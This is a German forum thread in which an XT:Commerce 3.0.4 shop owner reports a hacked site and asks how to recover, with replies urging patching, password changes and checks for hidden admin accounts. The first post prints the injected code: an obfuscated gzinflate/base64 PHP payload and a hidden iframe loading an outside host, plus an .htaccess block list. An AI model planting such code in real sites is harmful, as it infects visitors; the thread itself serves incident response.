Gehackt!!!!!! Wichtig !!!!!! Was tun!!!!!

  • Hallo zusammen,


    TEIL 1:


    ich wollte heute auf meinen Online Shop gehen und auf einmal kam die Nachricht "attackierende Seite" !!!


    Sieher hier: Als attackierend gemeldete Website – was tun? : Suchmaschinenoptimierung professionell.



    TEIL 2:


    Ich bin dann über eine virtuelle Maschine auf meinen Shop gegangen und habe mir sofort einen Trojaner eingefangen!


    Dann habe ich mir meine index.html usw. angeschaut und finde auch sofort Codes und IFrames !



    SIEHE HIER CODE - zu finden in (SHOP\admin\index.php):


    #c3284d#
    echo(gzinflate(base64_decode("JY5BDsIgFET3TXoH8jfqpiQuFXoKL/AFBJQCgV/R20vtbvKSNzOiquIzMfpmI4HMh/gT37hTmMdBJ7UuJtLUiidzPAj/KLgYVouS4IjyhfOMzmJ71UmlhevUYkioeSWkOmWXgcVuSLg1T2QKsN6eQvDRSsCVErB/5T0VbYqE2AEGb6ME1Yc3wRlvHUk4A2tek9vSLPh+ZT6cruMg+P55/gE=")));
    #/c3284d#
    ?>




    SIEHE HIER IFRAME in index.html - zu finden in (SHOP\usage\index.html):


    document.write('<iframe src="http://pahgawks.com/download/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');


    </script><!--/c3284d-->


    TEIL 3: Man sieht in dem IFrame die Seite "http://pahgawks.com/download/stats.php" ich bin mit meiner virtuellen Maschine drauf gegangen und siehe da was plötzlich da steht:


    [IMG:http://h11.abload.de/img/asdadsdsddaj2jnh.jpg]


    Ich frage EUCH, kann DAS überhaupt sein???? Der Kerl muss den Text schon länger dort stehen haben... und ich wurde gestern am (7.7.12) gehackt und erst da trat der IFrame auf!!! Kann mir nicht vorstellen das der Typ von nichts weis und so tut als wäre es normal das es über seinen Server läuft ?!?!?




    4. Nun meine Fragen... was TUN? Es ist ein Notfall, der Shop hält mich über Wasser!


    Ich habe ein KOMPLETT Trojanerfreies Backup vom ganzen Shop!
    Wie gehe ich nun vor?


    Habe grad ALLE FTP Dateien gelöscht.


    Sollte ich nun Strato anschreiben und denen sagen das die meinen FTP komplett cleanen sollen und nach shell scripts absuchen sollen oder soetwas, oder ist das hinfällig da ich alles gelöscht habe?
    Oder sollen die vorallem IHREN SERVER cleanen, es kann ja sein das der gesamte Server gehackt wurde, oder?


    Wenn soweit von Seiten Strato alles SAUBER ist, kann ich bedenkenlos mein ShopBackup draufladen und den Shop neu hochfahren?



    5. Wenn der Shop wieder läuft, wo bekomme ich die besten und neusten Sicherheitsupdates für einen XT COMMERCE 3.0.4 Shop? Suche gerade und finde nichts passendes, BITTE wirklich um hilfe!



    6. In einem anderen Thread schrieb jemand, man sollte auf jeden Fall folgende Liste in die ".htaccess" schreiben:



    # Sperre nach Agent
    SetEnvIfNoCase user-agent "1337" bad_bot=1
    SetEnvIfNoCase user-agent "acont" bad_bot=1
    SetEnvIfNoCase user-agent "CatchBot" bad_bot=1
    SetEnvIfNoCase user-agent "Daumoa" bad_bot=1
    SetEnvIfNoCase user-agent "DomainCrawler" bad_bot=1
    SetEnvIfNoCase user-agent "DotBot" bad_bot=1
    SetEnvIfNoCase user-agent "DTS Agent" bad_bot=1
    SetEnvIfNoCase user-agent "dug-portal" bad_bot=1
    SetEnvIfNoCase user-agent "EuripBot" bad_bot=1
    SetEnvIfNoCase user-agent "Eurobot" bad_bot=1
    SetEnvIfNoCase user-agent "FDM" bad_bot=1
    SetEnvIfNoCase user-agent "findlinks" bad_bot=1
    SetEnvIfNoCase user-agent "FollowSite" bad_bot=1
    SetEnvIfNoCase user-agent "Grub" bad_bot=1
    SetEnvIfNoCase user-agent "iCcrawler" bad_bot=1
    SetEnvIfNoCase user-agent "JadynAveBot" bad_bot=1
    SetEnvIfNoCase user-agent "Java" bad_bot=1
    SetEnvIfNoCase user-agent "Jyxobot" bad_bot=1
    SetEnvIfNoCase user-agent "libwww" bad_bot=1
    SetEnvIfNoCase user-agent "LinkWalker" bad_bot=1
    SetEnvIfNoCase user-agent "lmspider" bad_bot=1
    SetEnvIfNoCase user-agent "Mechanize" bad_bot=1
    SetEnvIfNoCase user-agent "MJ12bot" bad_bot=1
    SetEnvIfNoCase user-agent "MLBot" bad_bot=1
    SetEnvIfNoCase user-agent "Netluchs" bad_bot=1
    SetEnvIfNoCase user-agent "Ocelli" bad_bot=1
    SetEnvIfNoCase user-agent "Plonebot" bad_bot=1
    SetEnvIfNoCase user-agent "psbot" bad_bot=1
    SetEnvIfNoCase user-agent "Rexyobot" bad_bot=1
    SetEnvIfNoCase user-agent "ruky" bad_bot=1
    SetEnvIfNoCase user-agent "Sapphire" bad_bot=1
    SetEnvIfNoCase user-agent "ScoutJet" bad_bot=1
    SetEnvIfNoCase user-agent "Seekbot" bad_bot=1
    SetEnvIfNoCase user-agent "Speedy Spider" bad_bot=1
    SetEnvIfNoCase user-agent "SurveyBot" bad_bot=1
    SetEnvIfNoCase user-agent "susie" bad_bot=1
    SetEnvIfNoCase user-agent "Toplistbot" bad_bot=1
    SetEnvIfNoCase user-agent "Twiceler" bad_bot=1
    SetEnvIfNoCase user-agent "Updater" bad_bot=1
    SetEnvIfNoCase user-agent "WebDataCentreBot" bad_bot=1
    SetEnvIfNoCase user-agent "weive" bad_bot=1
    SetEnvIfNoCase user-agent "Yandex" bad_bot=1
    SetEnvIfNoCase user-agent "Yanga" bad_bot=1
    SetEnvIfNoCase user-agent "Yeti" bad_bot=1


    # Sperre nach IP
    SetEnvIfNoCase remote_addr "^91.98.*" bad_bot=1


    # Sperre nach Request
    SetEnvIfNoCase request_uri "^w00tw00t.*" bad_bot=1


    <FilesMatch "(.*)">
    Order Allow,Deny
    Allow from all
    Deny from env=bad_bot
    </FilesMatch>





    Meine Frage wäre nun wie das aussehen würde (habe da keine Ahnung von)?!
    Erstelle ich eine neue Datei die so heißt und wenn ja, wo wird die im Shop abgelegt?


    Oder änder ich z.B eine .htacces die im HAUPT-Shop-Ordner liegt?
    Dort steht gerade folgendes drin:


    RewriteEngine off
    DirectoryIndex webalizer.html
    AuthUserFile /www/htdocs/w0ssdg38e//usage//.htpasswd
    AuthGroupFile /dev/null
    AuthName ByPassword
    AuthType Basic
    <Limit GET POST>
    require user w00ba88e
    </Limit>



    Würde man die Liste von oben einfach unter das </Limit> kopieren, oder wie muss soetwas dann aussehen?




    EDIT: 7. Kann ich auch in die htacces reinschreiben das DIREKT Auslands IPs (russland/china) komplett gesperrt werden?? Ist das machbar? Wenn ja, wie?





    Danke schonmal und ich hoffe mir kann jemand helfen :(



  • Also ersteinmal , du bist im falschen Forum gelandet, deine XT COMMERCE 3.0.4 wird hier eigentlich nicht behandelt.


    zu deiner Frage : nein, du solltest nicht einfach dein Shopbackup wieder hochladen sondern zunächst auch die Datenbank überprüfen, je nachdem wie dein Angreifer vorgegangen ist, kann es z.B. sein das er dir versteckte Adminaccounts untergejubelt hat (die tauchen dann nicht in der Übersicht auch), ausserdem solltest du natürlich auch alle Passwörter ändern, also auch alle Adminpasswörter im Shop selbst und zunächst auch deinen Rechner mal scannen.


    deine Shopversion ist auch sehr sehr alt, wenn du die nicht regelmäßig gepatched hast, wird es da eine ganze Menge Lücken geben, je nach Know-How auf deiner Seite, würde ich dir raten die Version zu aktualisieren bzw das machen zu lassen, auf http://www.xtc-load.de/ findest du z.B. die Servicepacks und auch aktuelle Sicherheitspatches für xt-Shops, lies mal insbesondere diesen hier, http://www.xtc-load.de/2012/06…pdate-fur-alle-xtc-forks/ der ist grad aktuell und ich habe schon ein paar Angriffe darüber mitbekommen, soll heissen die Lücke wird grad von so einigen ausgenutzt.


    Mit besten Grüßen aus Hamburg


    Mario

  • Der Beitrag ist zwar schon etwas älter, aber ich möchte euch dringend raten, solltet Ihr mit eurem Shop Geld verdienen wollen, wendet euch zwecks Betreuung des Systems unbedingt an einen Administrator.


    Unser Shop wurde 2011 ebenfalls gehackt und niemand seitens Strato hat uns geholfen. Es ging sogar soweit, dass Strato unseren Server vom Netz genommen hatte.


    Was das für die Serps bedeutet hat, muß ich bestimmt nicht erwähnen, das war ein gigantischer finanzieller Verlust.


    Eventuell hat man mit einem Managed Server mehr Erfolg bei Strato, bei einem normalen Server ist aber ausschließlich der Admin C für sämtliche Arbeiten verantwortlich, niemals Strato.


    Daher haben wir uns entschlossen, einen Admin zu beauftragen, der sich um die Administration vom Server kümmert.


    Greetz pq

  • Ja, das haben wir bei älteren Shopversionen auch öfter mal fest gestellt. Also dringend ein aktuellen Shop nehmen und auf die FTP Daten achten! Auch hier gibt es genügend Einfalltore.

    <p>Wir geben nur Anregungen und Hilfestellung auf Basis unserer Erfahrung, keine Rechtshilfe!<br>\m/('_')\m/</p>

  • hoi,


    erinnere ich mich richtig das wir speziell die sql-cmds wie benchmark, etc. schon mitte 2011 rausgenommen haben?
    nebenbei kann ich dir nur die empfehlung geben, dir ein aktuelles shopsystem zu besorgen. der offizielle support für die version ist von xtc eingestellt, und du wirst nur mit inoffiziellen userupdates ausgerüstet, was ich persönlich für schwierig halte...



    greetz, me

    <p>C lets you shoot in your feet, C++ allows you to reuse the bullet.</p>
    <p><strong>Thats <span style="color: #b22222">NO BUGS</span>, thats <span style="color: #008000">FEATURES</span>!
    </strong></p>
    <p><strong></strong>[LEFT]<strong><span style="color: green">Die Suchfunktion steht nicht unter Naturschutz, und darf getrost benutzt werden.</span></strong><br>[/LEFT]<br>[INDENT=4] <img src="http://support.commerce-seo.de/image.php?type=sigpic&amp;amp;userid=64&amp;amp;dateline=1309425110"><br>[/INDENT]</p>